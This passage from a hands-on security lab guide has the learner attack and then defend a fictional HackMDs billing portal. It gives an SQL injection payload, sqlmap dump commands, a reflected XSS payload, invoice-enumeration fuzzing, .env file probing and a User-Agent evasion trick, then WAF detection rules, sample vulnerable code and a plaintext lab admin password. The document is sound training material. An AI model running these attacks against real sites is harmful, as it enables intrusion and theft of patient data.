    After converting the event into a case, we can work on different activities according to NIST 800-61 computer security incident handling best practices. Within the Workbook tab, expand each of these activities to examine what workbook tasks you should consider researching with this case:


    This is just a small representation of the value a SOC can obtain as a result of using a security orchestration, automation, and response (SOAR) solution such as Phantom. Feel free to check out other features within Phantom.

    Congratulations! You have completed this scenario.

    Web Defense and Resource Sustainability Part 1: WAF Focus

    Value Proposition: With the proliferation of the cloud and the digital services and mobile apps it hosts, today’s organizations are heavily invested in their presence on the web. These investments introduce new challenges for security, since a traditional firewall provides very little defense against web application attacks. Firewalls provide perimeter protection; however, firewalls lack the capability to defend against SQL injection, DDoS and other web application-focused attacks. Securing web applications requires specialized firewalls that focus on layer 7, also known as the application layer. Check out the latest OWASP Top 10 web application security vulnerabilities to learn more about this threat vector.

    In this scenario, Mr. Black has tasked his favorite script kiddie, Mr. Orange, to steal sensitive data from HackMDs. Stolen data will be used to extort HackMDs leadership or sold on the darknet. Mr. Black has identified that a new HackMDs Billing Portal has been launched, and it will be Mr. Orange’s target for this attack.

    After watching videos on YouTube, Mr. Orange has concluded that attacking many Web Applications is a simple task. First, Mr. Orange will scan the new HackMDs billing site using the ZAP tool. This tool will scan for OWASP’s Top 10 vulnerabilities, many of which can lead to disclosure of sensitive data and exploitation of the web application. Several vulnerabilities are likely to be found on the HackMDs new billing site, including the following as defined by OWASP:

    A1: Injection: The application is susceptible to SQL Injection using the ‘invoice=’ parameter / value pair.

    FIX: Injection should be resolved in the application, however in instances where you can’t fix the application, a solution such as the Radware AppWall WAF can prevent exploitation.

    A1: Injection: The billing application has debug functionality that when called can display running processes on the system. An attacker is also in control of the values being called, which is how command injection is invoked.

    FIX: This application is designed poorly. While Radware AppWall could control the parameters being called so that they are not manipulated, the best solution for this situation is to fix the application.

    A5: Broken Access Control: Incrementing the values in the ‘invoice=’ parameter can disclose PII. Using the ZAP Fuzzer, an attacker can enumerate all the PII.

    FIX: This application needs to restrict access by additional validations to view data.

    A7: Cross-Site Scripting (XSS): The Application is susceptible to XSS in the invoice= parameter.

    FIX: The best solution is to fix the application however, Radware AppWall can also provide protection in the event one cannot immediately patch the application.
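    To make the four FIX notes above concrete, here is an added example (not the HackMDs billing code, which is a PHP page we never see) of an invoice lookup written the way the list describes it, beside a version that fixes A1, A5 and A7 in the application: the parameter is validated against the eight-digit format, bound instead of concatenated, restricted to the caller’s own invoices, and HTML-escaped before it is reflected. The table contents and the current_user argument are constructed for the example.

```python
"""Vulnerable and hardened versions of an 'invoice=' lookup, modeled on the defects listed above."""
import html
import re
import sqlite3

INVOICE_RE = re.compile(r"[0-9]{8}")  # the billing form expects an eight-digit invoice number


def make_db():
    """Constructed in-memory table standing in for the billing database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE invoices (invoice TEXT PRIMARY KEY, owner TEXT, card_last4 TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO invoices VALUES (?, ?, ?, ?)",
        [
            ("00000001", "alice", "1111", "alice@example.invalid"),
            ("00000005", "bob", "5555", "bob@example.invalid"),
            ("00000008", "carol", "8888", "carol@example.invalid"),
        ],
    )
    return conn


def lookup_vulnerable(conn, invoice):
    """A1: query built by string concatenation; A7: input reflected raw; A5: no ownership check."""
    sql = f"SELECT invoice, card_last4, email FROM invoices WHERE invoice = '{invoice}'"
    rows = conn.execute(sql).fetchall()
    body = f"<p>Invoice number: {invoice}</p>"
    for inv, card, email in rows:
        body += f"<p>{inv}: card ****{card}, email {email}</p>"
    return body


def lookup_hardened(conn, invoice, current_user):
    """Validate the parameter, bind it, restrict to the caller's invoices, escape on output."""
    if not INVOICE_RE.fullmatch(invoice):
        return "<p>Invalid invoice number.</p>"
    row = conn.execute(
        "SELECT invoice, card_last4, email FROM invoices WHERE invoice = ? AND owner = ?",
        (invoice, current_user),
    ).fetchone()
    if row is None:
        # Same answer for 'does not exist' and 'not yours': no signal for enumeration
        return "<p>No invoice found.</p>"
    inv, card, email = (html.escape(v) for v in row)
    return f"<p>Invoice number: {inv}</p><p>{inv}: card ****{card}, email {email}</p>"


def rows_rendered(page):
    """Number of invoice records a response exposes (used by the checks below)."""
    return page.count("card ****")


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "00000001"))
    print(lookup_hardened(db, "00000001", "alice"))
    print(lookup_hardened(db, "00000005", "alice"))  # bob's invoice: not disclosed
```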

    Mr. Orange, armed with this information, has several options. One option is to constrain his attack to the webserver and extract just the PII in the server. Another option is to drop a cryptominer on the server and attempt to gain additional monetary value from the attack. A third option could be to use this server as a launching point to gain access into the HackMDs network. Accomplishing one or more of these objectives will be a win for Mr. Orange and prove he is ready for more elite hacking tasks.

    Outcome

    At the end of this scenario, you will have delivered several Web Application exploitation attacks exploiting a new HackMDS billing server. You will first discover the application, look for vulnerabilities, and attempt to either take control of the server or steal data within the server. The HackMDS server is in the DMZ. Compromising this system could also provide a foothold into the network. Did the HackMDs team secure their DMZ so that servers are not able to talk to other systems without restriction?

    All your Web Apps ARE Belong to Us!!!

    After completing the exploitation of the HackMDS billing application, you will switch roles to the defense team. As the defender, you will monitor traffic types coming into the billing server. There are certain attacks which can be stopped by a next generation firewall (NGFW) such as Cisco Firepower NGIPS, but most NGFWs are tuned and designed to prevent network attacks rather than dynamic Web attacks. HackMDs has just implemented a Radware WAF, which can prevent many types of dynamic attacks. Nothing is 100%, and sophisticated attackers can attempt to bypass a WAF; however, for most of the attacks seen on the Web, a WAF provides the additional layer of security that is needed to properly safeguard Web Applications.

    Lab Resources

    • Attacker Resource 1: Kali Linux Rolling Edition (includes tools that we can use.)

    • Target Resource 1: HackMDs DMZ server running Ubuntu

    • Defender Resource 1: Radware Alteon running AppWall

    • Defender Resource 4: Endpoint Logging and Endpoint Controls

    In this lab, Mr. Orange will exploit a new HackMDs Web Application used for validating invoices. If you have used a payment application on the internet for medical invoicing and billing of services, this application may seem familiar. The new HackMDs application, however, is horribly designed to allow for an attacker to enumerate all accounts and many other nefarious actions.

    Who wrote this app?

    Explore the Application

    Procedure


     1   

    Connect to the Kali Linux server.

     2   

    Open the Firefox web browser on Kali Linux, which is the icon at the bottom of the screen showing a globe and arrow.

     3   

    Click the ZAP icon to open the ZAP Web Browser, and then leave it running in the background.

     4   

    If ZAP asks you to update a few things, click Update All, and then close the pop-up when updates are complete.

     5   

    With Firefox open, go to www.hackmds.com or click the hackmds.com tab. The website will show a menu item (1) for secured billing. Click this menu item.

     6   

    Within the Firefox browser, turn on proxying through ZAP by using the Proxy button. This proxy button will allow traffic to go through ZAP or around ZAP. Clicking the circle will allow you to bypass ZAP (grey icon) or proxy through ZAP (light blue icon). For this exercise, we want the light blue icon.

     7   

    If you see a certificate error after enabling ZAP, click Advanced and accept the risk.

     8   

    Reload the page in Firefox and switch to ZAP by clicking the ZAP tab at the top.

    You should see sites appear in ZAP. Look for www.hackmds.com, as shown below. On the left is the Sites tree. On the right are the Requests that go to the server and the Responses from the server.

    Now that Mr. Orange is set up and ready to go, let’s explore the billing web application. This application has a form, and the instructions are straightforward. Let’s try entering an eight-digit number such as 00000001. What happens if we enter this number?

     9   

    Enter 00000001 to see if we get any data. You should see a few things occur. Going from top to bottom, the Invoice number is reflected directly back. Could this be an injection point for XSS? Next, we have both Credit Card Number and Email.

     10   

    Let’s work these vulnerabilities one at a time. First, can we enumerate more than one number? Let’s try 00000002. Go to the top of the browser and edit the URL so that the 1 is a 2. You should see some strange behavior, including a SQL statement. Is this debug output?

     11   

    We have a few options to abuse this vulnerability. One of which is to rotate the numbers one at a time until we find more data. While going 0-10 is easy, how many combinations are in 8 digits? The answer is 10^8, or 100,000,000 attempts, which will take forever to run through. There is a faster way. First let’s see if we can rotate numbers in ZAP. Let’s use the Fuzz utility in ZAP to see if we can get a few more pieces of data. Go to ZAP by clicking the tab at the top.

     12   

    On the left panel of ZAP, locate in the tree the billing folder by clicking the triangle next to the www.hackmds.com folder and work your way down into what was found. Work your way to the “GET” called invcheck.php (invoice). You will see the request in the request tab in the right side window. In there you will see the 00000001. Highlight the 1.

     13   

    Right-click the highlighted 1 and in the menu choose fuzz.

     14   

    The Fuzz menu by default will have a colored highlight item. To choose the type of payload, click Payloads….

     15   

    Next choose Add.

     16   

    Next, we must choose a Fuzzer payload. Let’s choose Numberzz, which will give us a set of numbers.

     17   

    To configure Numberzz let’s make the following changes.

    1. From: 1

    2. To: 9

    3. Increment: 1

     18   

    Click Generate Preview. If you get a list of numbers 1 – 9, click Add.

     19   

    When this is complete, you can click the OK button and click Start Fuzzer. This will allow you to start Fuzzing the website.

     20   

    At the bottom of the screen, you will see the fuzzer results. Sort this area by “Size Resp. Body”. This will allow us to look for pages that are larger than other pages. You will find three responses that are in fact larger: the invoices ending in 1, 5, and 8 (00000001, 00000005 and 00000008). You can confirm this by searching in the response window. You can manually visit these pages, view the details of the response window, and move on.

    Could there be more data than what was displayed by these three invoices? Mr. Orange (you) will attempt the next attack which is to look for SQL Injection. Many attackers may just point SQLMap at the website. For this exercise, you will play with the application by hand.

     21   

    On the billing page, enter a single quote (') in the billing name. You will find what is known as error-based SQL injection, which is rare on the internet because most scanners find and exploit it easily. You may, however, see this vulnerability on an internal network.

     22   

    There are two things to notice: first, the error itself, and second, the debug output. We could manually dump the contents of the table in the database by entering ' or 1=1;-- (the payload begins with a single quote, and the trailing comment marker is two hyphens). Try it and you will see the contents of the database.
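    To see why a lone quote produces an error and the tautology dumps the whole table, here is an added example (not code from the lab or the HackMDs application) that models the invoice lookup in Python against an in-memory SQLite table of constructed records. The vulnerable function concatenates the parameter into the SQL text, which is evidently what the lab's invcheck.php does; the hardened function beside it binds the value as a parameter and validates the format first. The table and column names and the sample records are assumptions.

```python
import sqlite3

# Constructed sample records standing in for the HackMDs billing table (not the lab's data).
SAMPLE_INVOICES = [
    ("00000001", "Alice Example", "4111111111111111", "alice@example.com"),
    ("00000005", "Bob Example", "5500000000000004", "bob@example.com"),
    ("00000008", "Carol Example", "340000000000009", "carol@example.com"),
]


def make_db():
    """Create an in-memory SQLite database holding the sample invoices."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE invoices (invoice TEXT, name TEXT, card TEXT, email TEXT)")
    conn.executemany("INSERT INTO invoices VALUES (?, ?, ?, ?)", SAMPLE_INVOICES)
    return conn


def lookup_vulnerable(conn, invoice):
    """The injection point: the parameter is concatenated into the SQL text.
    A lone quote breaks the string literal, and the database error (carrying the
    failing query) is reflected back, which is the debug output seen in the lab.
    A tautology such as ' or 1=1;-- turns the WHERE clause into 'match everything'."""
    query = ("SELECT invoice, name, card, email FROM invoices "
             "WHERE invoice = '" + invoice + "'")
    try:
        return conn.execute(query).fetchall()
    except sqlite3.OperationalError as exc:
        # Error-based behaviour: the application echoes the SQL error to the client.
        return [("ERROR", str(exc), query)]


def lookup_hardened(conn, invoice):
    """Parameterised query plus allow-list validation: the value is bound as data,
    so it can never change the structure of the statement, and anything that is
    not an eight-digit invoice number is rejected before the database is touched."""
    if not (len(invoice) == 8 and invoice.isdigit()):
        return []
    return conn.execute(
        "SELECT invoice, name, card, email FROM invoices WHERE invoice = ?",
        (invoice,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for probe in ("00000001", "'", "' or 1=1;--"):
        print("vulnerable", repr(probe), "->", lookup_vulnerable(db, probe))
        print("hardened  ", repr(probe), "->", lookup_hardened(db, probe))
```

    Running the block shows the contrast: the vulnerable lookup echoes the SQL error for the lone quote and returns every row for the tautology, while the hardened lookup returns nothing for either probe and still serves a genuine invoice number. This is the fix a WAF cannot substitute for: with bound parameters there is no SQL text for the input to become part of.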

     23   

    Wow, that displayed a bunch of patient records. That works, but let’s try a better approach by using the following sqlmap commands. Open a terminal window in Kali (the terminal icon is at the bottom of the screen).

     24   

    From the window type the following: sqlmap -u 'http://www.hackmds.com/billing/invcheck.php?invoice=1' --batch

     25   

    The command syntax can be difficult to read at times. There is a text file in the /root/Documents folder that will help you. Open it, right-click the command you want, and copy and paste it. Type the following into a command prompt to display the help file you can copy from: cat /root/Documents/waf-attacks.txt

     26   

    This should be the final output of the command if you typed it correctly (or copied it). The highlighted sections show that the SQL database is indeed injectable. Let’s attempt to dump its contents by specifying the --dump option. Press the up arrow to bring back the command you entered and change the last part, “--batch”, to “--dump”.

     27   

    Specifying this command, we see the entire set of databases.

    Mr. Orange also believes that there could be a cross-site scripting (XSS) vulnerability in the application. With XSS he could manipulate computers inside of HackMDS to deliver malicious JavaScript through phishing and other mechanisms. To find the XSS you must intercept the transaction BETWEEN the browser and the server.

     28   

    Go back to the main billing page but don’t submit anything yet.

     29   

    Go back to ZAP and click the green radio button on the top of the application. This will change its color to red.

     30   

    You now have a new tab called Break, which will intercept and pause all transactions to allow you to freely manipulate them. At this point, you have paused your ability to interact with the website until you permit traffic to play again. Go back to the main billing page, enter a number 1 for the invoice number.

    Note: If you didn’t go to the billing page before pausing your session in ZAP, you will first need to un-pause the session by changing the circle button in ZAP back to green and going to the main billing page in Firefox. After bringing up the bill page, go back to ZAP and change the green radio button to red.
    Note: Everything will be paused at this point when the break button is red in ZAP. You must go back to ZAP before you can continue.
     31   

    Go back to the ZAP Proxy. You should see the captured request in the right window, and it will be editable.

     32   

    Change the 1 to the following:

    <script>alert(1)</script>
     33   

    Click the play button to let the edited request continue to the server.

    Note: We provided this in the WAF-attacks.txt file, as well.

    When you return to Firefox you should see the 1 pop-up box. This result shows this site is vulnerable to reflected cross-site scripting! This means that we can send links to internal users and get them to execute malicious JavaScript that controls their browsers.
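    The reflection that makes this pop-up possible, and the fix for it, as an added Python example (not code from the lab or the HackMDs application): the first function echoes the invoice parameter into the page unencoded, the second applies HTML output encoding so the same probe is displayed as text rather than executed. The page fragments and the form field name are assumptions.

```python
import html
import re

# The same reflected-XSS probe the lab sends through ZAP.
PROBE = "<script>alert(1)</script>"


def render_vulnerable(invoice):
    """Reflects the invoice parameter straight into the HTML body.
    Whatever the client sent is rendered as markup, so a <script> tag executes."""
    return "<p>Invoice number: " + invoice + "</p>"


def render_hardened(invoice):
    """Output encoding for the HTML text context: every character that could open
    a tag or entity is escaped, so the value is displayed, never executed."""
    return "<p>Invoice number: " + html.escape(invoice, quote=True) + "</p>"


def render_form_hardened(invoice):
    """The same value echoed back into the form field (attribute context): with
    quote=True the double quote is escaped too, so the value cannot close the
    attribute and start a new one."""
    return '<input type="text" name="invoice" value="' + html.escape(invoice, quote=True) + '">'


ACTIVE_SCRIPT = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(page):
    """Test helper: does the rendered page still contain an un-escaped <script> tag?"""
    return ACTIVE_SCRIPT.search(page) is not None


if __name__ == "__main__":
    for renderer in (render_vulnerable, render_hardened, render_form_hardened):
        page = renderer(PROBE)
        print(renderer.__name__, "live script:", contains_live_script(page))
        print("   ", page)
```

    Encoding must match the output context (HTML body, attribute, JavaScript, URL); html.escape covers the first two, which is where this application reflects the value. A Content-Security-Policy that disallows inline script is worth adding as defence in depth, and the WAF in the next part of this scenario catches the literal probe, but only encoding at the application removes the bug itself.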

     34   

    The final vulnerability Mr. Orange will investigate will be seen through scanning. The website www.hackmds.com is hosted on 198.19.20.5. Let’s navigate to this directory by typing http://198.19.20.5 in the Firefox web browser.

    We should see directory browsing:

    This happens often with default Apache2 installations. In addition, you can start enumerating for hidden files. One particularly bad file to find would be a .env file. These files typically contain keys and other sensitive information that could be used to hijack accounts.

     35   

    In Firefox, navigate to: http://198.19.20.5/.env.

    We should now see the contents of a very sensitive file:

    Mr. Orange is satisfied with what he’s gained so far and he’s happy to go back to Mr. Black for his cash reward. Mr. Black can use this vulnerable application to launch attacks against HackMDs users as well as pull down sensitive data using what was found by Mr. Orange. The result would be a very bad day for the HackMDs organization!


    Defend Web Resources with Web Application Firewalls

    How can you defend against web application attacks? Next Generation Firewalls may help, but most are not designed to stop application-layer exploitation. Instead, we will use a Web Application Firewall (WAF). There are a few ways that a Web Application Firewall can be installed. The most common are inline as a gateway or configuring the WAF to act as a proxy. We will be implementing the new HackMDs WAF in one-armed proxy mode, living on the same Layer 3 (network) segment as the web server. To do this, we must configure two things. First, we must set the WAF as a listener, which will be on 198.19.20.7. Next, we need a proxy IP to return the traffic, which will be 198.19.20.4. We can now send all 198.19.20.7 traffic for www.hackmds.com specifically to the web server. The new WAF design will look like the following.

    To ensure that this works, we have created a new test URL to send all traffic to (secured.hackmds.com). This will allow all web traffic to be redirected over to the web server for inspection by the WAF. This will prevent attacks that are specifically designed for webservers. You can also perform SSL Man in the Middle inspection if you need to for these webservers or provide SSL Encryption.

    Procedure


     1   

    To start off the role of the defender, click the back arrow to return to the GUAC server. Select the jumphost.

     2   

    On the jumphost (not kali attack server), open the Firefox web browser. You should see multiple tools come up including tabs for the Radware Alteon – WAF. You can also bring it up by clicking the Radware Alteon – WAF bookmark.

    1. The username is admin and the password is C1sco21345.

     3   

    You should see the main Radware Alteon dashboard. Next, we will go to the Forensics view by clicking the Forensics button.

     4   

    On the Forensics Screen, click the gray arrows and open Alteon -> Security -> HackMDS-Simplified. You will need to scroll down a little to see the HackMDS-Simplified option.

     5   

    You may see some attacks already. If you want to discard those results, you can click the trashcan icon at the bottom of the list to remove them. The WAF will prompt you with “delete all?”, to which you must answer yes to remove those logs.

    With this view set up, you can monitor application exploitation.

     6   

    Let’s go back to the Kali Attack desktop.

     7   

    When you are in the Kali Attack desktop, go to the secured version of the web portal found at http://secured.hackmds.com. You can access this by clicking the bookmark or typing it in.

     8   

    Click the Secured Billing portal.

     9   

    In the Invoice Number search field, type .

    Once you do this, you will now see a new screen that shows a default block page. You may wish to obscure this with a generic message, but for the purposes of this demo we are leaving the OBVIOUS block. This block page is customizable.

     10   

    Next, let’s go to the Jumphost again and click the HackMDS-Simplified view in Radware to see what the defense would see after this attack is launched. You will see the attack data within the Events window within AppWall. New events with the words “SQL Injection” will appear. Ensure you are in the HackMDS-Simplified view to see this data.

     11   

    Click the event that states “Database” found under the “Generated By” tab. Other events will say “Security Filters – Vulnerabilities”. The Database event should be under multiple “Security Filters – Vulnerabilities” events.

    It’s clear from the description below what caused the WAF to trigger. You can see these details in the description window after you select the event including the database.

    Let’s explore some more attacks.

     12   

    Go back to the Kali workstation and bring up the command line where you used the sqlmap tool. Run the original command for discovering SQL injection by pressing the up arrow or retyping the command. This time we will change the URL to secured.hackmds.com instead of www.hackmds.com, as shown: sqlmap -u 'http://secured.hackmds.com/billing/invcheck.php?invoice=1' --batch

    You should see errors now, rather than having the success you had exploiting the unsecured version of the billing website.

    One of the configurations that HackMDS added to the WAF was an automatic penalization feature. As numerous events appear from a single IP address, the WAF eventually will automatically block the IP address. This automated exploitation will trigger the automatic blacklist of the Kali Linux attack server.

     13   

    To continue the lab, we will need to unblock ourselves. Let’s switch to the JumpHost and unblock our attacker.

    Looking back at the events within the AppWall WAF, you will see the top event has now blocked the attacker’s IP address.

    Note: While some of these features are important to implement, an attacker can circumvent some of these by using cloud based environments to launch attacks.
     14   

    Let’s unblock our attacker IP. Within Radware AppWall, go to Configuration > Alteon > Services > Source Blocking > Blocked Sources.

     15   

    Finally, click the IP address (our Kali Linux attacker IP), and then click Submit. This will clear the block.

     16   

    Let’s now click Forensics and return to our HackMDS-Simplified View.

     17   

    Click one of the SQL Injection threats that was generated by “Security Filters – Vulnerabilities” and read the description.

    The description text reads ‘Automatic SQL injection and database takeover tool’. This seems to imply that the sqlmap User-Agent string could have been detected.

    Let’s switch back to the Kali attacking device and attempt to circumvent this check for the sqlmap User-Agent string. As the attacker, you can assume this is how the detection works. You can perform a new attack simply by adding the --random-agent switch. This will not send the default User-Agent string from sqlmap. Instead, it will use a random User-Agent that simulates a standard web browser. The default User-Agent string used by sqlmap states it is sqlmap, and many WAFs will block on this one value alone. Let’s see how this WAF behaves when we bypass this one check. Maybe Mr. Orange can beat the WAF???

     18   

    Within the command line on the Kali Linux server, run the following command: sqlmap -u 'http://secured.hackmds.com/billing/invcheck.php?invoice=1' --random-agent --batch

    You should once again see errors in the scanning. RATS!!!!

     19   

    Switch back to the jumphost and view the AppWall.

     20   

    Refresh your browser to see additional attacks. Many of these events will show that SQL injection was attempted manually, which differs from the earlier automatic-tool events: now every request must be validated for injection attempts. Click some of the results to view the details of the attack.
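    What the WAF is doing on each request, as an added Python example that is not Radware's code: a small rule set inspects constructed requests, with the first rule keying on the sqlmap User-Agent (the check that --random-agent defeats) and the rest on the request payload itself, which is why the manual-style events keep appearing once the User-Agent is randomized. A source blocker then applies the automatic penalization seen in step 13 and the operator unblock of step 15. The request lines, rule patterns, the sqlmap User-Agent string and the three-event threshold are all constructed for the demo.

```python
import re
from collections import defaultdict

# Constructed requests (client IP, request path, User-Agent); not real lab traffic.
SAMPLE_REQUESTS = [
    ("198.19.10.50", "/billing/invcheck.php?invoice=00000001", "Mozilla/5.0"),
    ("198.19.10.50", "/billing/invcheck.php?invoice=' or 1=1;--", "Mozilla/5.0"),
    ("198.19.10.50", "/billing/invcheck.php?invoice=1", "sqlmap/1.6 (https://sqlmap.org)"),
    ("198.19.10.50", "/billing/invcheck.php?invoice=1 AND 1=1", "Mozilla/5.0 (Windows NT 10.0)"),
    ("198.19.10.50", "/billing/invcheck.php?invoice=<script>alert(1)</script>", "Mozilla/5.0"),
    ("198.19.10.50", "/.env", "Mozilla/5.0"),
    ("198.19.10.60", "/billing/invcheck.php?invoice=00000005", "Mozilla/5.0"),
]

# Each rule: (event name, request field it inspects, pattern). The first rule is the weak
# one the lab probes: it keys on the tool's default User-Agent and is defeated by
# --random-agent. The payload rules hold regardless of what User-Agent is sent.
RULES = [
    ("sqlmap user agent", "user_agent", re.compile(r"\bsqlmap\b", re.I)),
    ("SQL Injection", "path", re.compile(
        r"(?:'|%27)\s*(?:or|and)\b|\b(?:and|or)\s+\d+\s*=\s*\d+|\bunion\b.+\bselect\b", re.I)),
    ("Cross Site Scripting", "path", re.compile(r"(?:<|%3C)\s*script\b", re.I)),
    ("Sensitive file probe", "path", re.compile(r"/\.env\b", re.I)),
]


def inspect(path, user_agent):
    """Return the names of every rule the request trips (an empty list means clean)."""
    fields = {"path": path, "user_agent": user_agent}
    return [name for name, field, pattern in RULES if pattern.search(fields[field])]


class SourceBlocker:
    """Automatic penalization: after `threshold` security events from one client IP,
    further requests from it are refused until an operator unblocks it (the lab's
    Blocked Sources screen). The threshold value is an assumption for the demo."""

    def __init__(self, threshold=3):
        self.threshold = threshold
        self.events = defaultdict(int)
        self.blocked = set()

    def record(self, ip, hits):
        if hits:
            self.events[ip] += 1
            if self.events[ip] >= self.threshold:
                self.blocked.add(ip)

    def is_blocked(self, ip):
        return ip in self.blocked

    def unblock(self, ip):
        self.blocked.discard(ip)
        self.events[ip] = 0


def run_inspection(requests, threshold=3):
    """Inspect requests in order. Returns (findings, blocker), where findings is a list
    of (ip, path, events); a blocked source is marked instead of being inspected."""
    blocker = SourceBlocker(threshold)
    findings = []
    for ip, path, user_agent in requests:
        if blocker.is_blocked(ip):
            findings.append((ip, path, ["blocked source"]))
            continue
        hits = inspect(path, user_agent)
        blocker.record(ip, hits)
        findings.append((ip, path, hits))
    return findings, blocker


if __name__ == "__main__":
    results, blocker = run_inspection(SAMPLE_REQUESTS)
    for ip, path, events in results:
        print(ip, path, events or "clean")
    print("blocked sources:", sorted(blocker.blocked))
```

    Run as-is, the third request trips only the User-Agent rule, the fourth (a browser-like User-Agent carrying a tautology) trips the payload rule anyway, and that third event blocks the source so the later XSS and .env probes are refused without inspection. The point for a defender is the order of reliance: signature-on-tool checks are cheap but trivially evaded, payload inspection is what holds up, and per-source penalization limits automated abuse while remaining easy to lift for a legitimate client.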

     21   

    This automated attack may have blacklisted our Kali Linux attack system again. Repeat the steps to unblock the Kali Linux attack server within AppWall.

    Mr. Orange also tried XSS attacks against the server, which could lead to exploiting hosts that visit the website, as well as other malicious outcomes. Let’s see what happens when we attempt our XSS injection on the secured version of the billing portal.

     22   

    Switching back to the Kali attack server, use Firefox to visit the secured version of the billing website: http://secured.hackmds.com/billing or click the bookmark and select “secured billing portal”.

    This should take you to the page in which we can enter an invoice number:

     23   

    Enter the number 1, but DO NOT hit submit. Let’s first set up ZAP.

     24   

    Go back to ZAP. You will once again click the interception button to change it from green to red.

     25   

    At this point, we are ready to submit our attack since the next action will be paused and shown in the “break” section of ZAP.

     26   

    Go back to Firefox and submit the number 1 by clicking submit.

     27   

    Go back to ZAP and our transaction should be paused in the break tab.

     28   

    Let’s modify the captured session. Instead of invoice=1, let’s type invoice=<script>alert(1)</script>.

     29   

    Click the Play button to send the modified transaction to the web application representing an injection attack.

    This attack will bring up the Block Page in the Firefox Browser.

     30   

    Next, switch back to the Jumphost and look for the new Alert within AppWall. Click the threat titled Cross Site Scripting.

    This specific input containing <script> is obvious and easily caught by the Radware WAF.

     31   

    For our final attack against the secured WAF, go back to the Kali Linux attack server.

     32   

    Let’s attempt to look at the directories with sensitive information. Using Firefox in Kali Linux, go to the following URLs.

    1. http://198.19.20.7/

    2. http://198.19.20.7/.env

    None of these should work. Instead, you should see the same block page.

    Note: We are using the .7 IP address because .5 is straight to the webserver and bypasses the WAF. The WAF is listening on .7. This is done to simplify testing the unsecured and secured version of the HackMDs billing application.

    Oh no! We can see that all the attacks failed.

     33   

    One final item to try is capturing sensitive data by viewing client invoices: Go back to the Kali Linux attack server and go to the secured version of the billing page via http://secured.hackmds.com/billing. Optionally, you can click the bookmark and then select secured billing portal.

    Try looking at invoice 00000001. The difference is that sensitive data protections are now enabled by the Radware WAF. Specifically, the WAF masks the Credit Card Number with XXXXs. Radware offers various forms of data loss protection capabilities based on automatically masking sensitive items such as social security numbers, credit card numbers and many other options.
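    How response-side masking of this kind can work, as an added Python example (not Radware's implementation): candidate card numbers in an outbound body are confirmed with the Luhn check before being replaced with X's, keeping the last four digits, and SSN-shaped values are masked as well. The sample response body, the keep-last-four choice and the SSN format are constructed assumptions.

```python
import re

# Candidate card numbers: 14 to 19 digits, optionally separated by spaces or hyphens.
CARD_CANDIDATE = re.compile(r"\b(?:\d[ -]?){13,18}\d\b")
# US SSN shape (assumption for the demo): 3-2-4 digits with hyphens.
SSN_CANDIDATE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def luhn_ok(digits):
    """Luhn check on a string of digits. It keeps the masker from clobbering invoice or
    reference numbers that merely look like a card number."""
    total = 0
    for position, ch in enumerate(reversed(digits)):
        d = int(ch)
        if position % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(text, keep_last=4):
    """Replace every Luhn-valid card number in `text` with X's, keeping the last digits."""
    def replace(match):
        raw = match.group(0)
        digits = re.sub(r"\D", "", raw)
        if not luhn_ok(digits):
            return raw                 # not a card number: leave it untouched
        return "X" * (len(digits) - keep_last) + digits[-keep_last:]
    return CARD_CANDIDATE.sub(replace, text)


def mask_ssn(text):
    """Mask SSN-shaped values, keeping the last four digits."""
    return SSN_CANDIDATE.sub(lambda m: "XXX-XX-" + m.group(0)[-4:], text)


def mask_sensitive(text):
    """Apply every masking rule to an outbound response body."""
    return mask_ssn(mask_pan(text))


# Constructed response body resembling the billing lookup's output (not lab data).
# 4111 1111 1111 1111 passes Luhn; 1234567890123456 does not and must survive untouched.
SAMPLE_RESPONSE = (
    "Invoice number: 00000001\n"
    "Name: Alice Example\n"
    "Credit Card Number: 4111 1111 1111 1111\n"
    "Reference: 1234567890123456\n"
    "SSN: 123-45-6789\n"
    "Email: alice@example.com\n"
)

if __name__ == "__main__":
    print(mask_sensitive(SAMPLE_RESPONSE))
```

    The Luhn step is what separates useful masking from a blunt digit filter: the 16-digit reference number stays readable while the card number does not. Masking on the way out is a last line of defence for data the application has already decided to return; the invoice-enumeration weakness that lets an attacker request other customers' invoices still needs an authorization check in the application.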

    At this point, you have tested exploitation of an unsecured and secured web application. Take some time to click around the Radware AppWall Web Application Firewall as well as its centralized management console Vision found within the tabs of tools available to access on the defender jumphost desktop.

    Look out for future versions of the Cyber Defense Clinic that will feature Radware DDoS solutions as well as Centralized Management through Radware Vision, Splunk and QRadar!

    Congratulations! You have completed this scenario.


    Web Defense and Resource Sustainability Part 2: DDoS Focus

    Value Proposition: Mr. Orange failed to use web exploitation against the HackMDs web applications due to HackMDs’s recently deployed web application firewall. Mr. Black has instructed Mr. Orange to change tactics and focus on taking out the applications using denial of service attacks. By taking down the HackMDs web applications, Mr. Black will cause a major disruption in the HackMDs business due to patients not being able to schedule appointments, access their records or other online transactions. Mr. Black can use the blackout as an opportunity to exploit other systems while the HackMDs SOC is distracted, maintain the blackout until HackMDs experiences enough loss to go out of business, or ask for a ransom to avoid further disruption. First, Mr. Black needs Mr. Orange to prove through experimenting with different denial of service tools that Mr. Orange is capable of disrupting HackMDs’s web applications.

    About BDoS Attacks: Behavioral DDoS (BDoS) defense is a capability that differentiates Radware. Unlike other approaches in the market, DefensePro looks at multiple dimensions of traffic including the rate of traffic types, specific traffic parameters and the ratio of different parameters within the IP flow to accurately detect, characterize and generate mitigation filters to address zero-day attacks and maintain service under adaptive threat. The Radware security solution can detect attacks regardless of their volume, including targeted application attacks that may or may not have a volumetric component.

    At the end of this scenario, you will have delivered two different denial of service attacks with the goal of disrupting the HackMDs web applications. You will also learn how to defend against both protocol and volume-based DDoS attacks using Radware’s Defense Pro solution.

    There are three general types of denial-of-service attacks:

    • Volume-Based Attacks: These are the most common version of a DDoS. The attacker leverages multiple systems and internet connections to flood a website with traffic with the goal of overwhelming the target.

    • Protocol Attacks: Unlike volume-based attacks, protocol attacks aim to exhaust server resources instead of bandwidth. This means one system could render a web server unavailable if that attacker system is able to consume enough of its resources.

